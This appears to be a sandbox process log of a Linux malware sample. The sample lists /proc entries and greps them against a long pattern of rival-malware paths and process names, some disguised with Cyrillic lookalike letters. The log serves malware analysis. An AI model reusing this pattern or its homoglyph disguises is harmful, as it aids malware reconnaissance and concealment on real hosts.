/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1209
-
-
/bin/grepgrep exe2⤵PID:1212
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1211
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1214
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1216
-
-
/bin/grepgrep exe2⤵PID:1217
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1219
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1221
-
-
/bin/grepgrep exe2⤵PID:1222
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1224
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1226
-
-
/bin/grepgrep exe2⤵PID:1227
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1229
-
-
/bin/grepgrep exe2⤵PID:1232
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1231
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1234
-
-
/bin/grepgrep exe2⤵PID:1237
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1236
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1239
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1241
-
-
/bin/grepgrep exe2⤵PID:1242
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1244
-
-
/bin/grepgrep exe2⤵PID:1247
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1246
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1249
-
-
/bin/grepgrep exe2⤵PID:1252
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1251
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1254
-
-
/bin/grepgrep exe2⤵PID:1257
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1256
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1259
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1261
-
-
/bin/grepgrep exe2⤵PID:1262
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1264
-
-
/bin/grepgrep exe2⤵PID:1267
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1266
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1269
-
-
/bin/grepgrep exe2⤵PID:1272
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1271
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1274
-
-
/bin/grepgrep exe2⤵PID:1277
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1276
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1279
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1281
-
-
/bin/grepgrep exe2⤵PID:1282
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1284
-
-
/bin/lsls -latrh /proc/mtd2⤵PID:1286
-
-
/bin/grepgrep exe2⤵PID:1287
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1289
-
-
/bin/grepgrep exe2⤵PID:1292
-
-
/bin/lsls -latrh /proc/net2⤵PID:1291
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1294
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1296
-
-
/bin/grepgrep exe2⤵PID:1297
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1299
-
-
/bin/grepgrep exe2⤵PID:1302
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1301
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1304
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1306
-
-
/bin/grepgrep exe2⤵PID:1307
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1309
-
-
/bin/grepgrep exe2⤵PID:1312
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1311
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1314
-
-
/bin/grepgrep exe2⤵PID:1317
-
-
/bin/lsls -latrh /proc/self2⤵PID:1316
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1319
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1321
-
-
/bin/grepgrep exe2⤵PID:1322
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1324
-
-
/bin/grepgrep exe2⤵PID:1327
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1326
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1329
-
-
/bin/grepgrep exe2⤵PID:1332
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1331
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1334
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1336
-
-
/bin/grepgrep exe2⤵PID:1337
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1339
-
-
/bin/grepgrep exe2⤵PID:1342
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1341
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1344
-
-
/bin/grepgrep exe2⤵PID:1347
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1346
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1349
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1351
-
-
/bin/grepgrep exe2⤵PID:1352
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1354
-
-
/bin/grepgrep exe2⤵PID:1357
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1356
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1359
-
-
/bin/grepgrep exe2⤵PID:1362
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1361
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1365
-
-
/bin/grepgrep exe2⤵PID:1368
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1367
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1371
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1373
-
-
/bin/grepgrep exe2⤵PID:1374
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1376
-
-
/bin/grepgrep exe2⤵PID:1379
-
-
/bin/lsls -latrh /proc/version2⤵PID:1378
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1381
-
-
/bin/grepgrep exe2⤵PID:1384
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1383
-
-
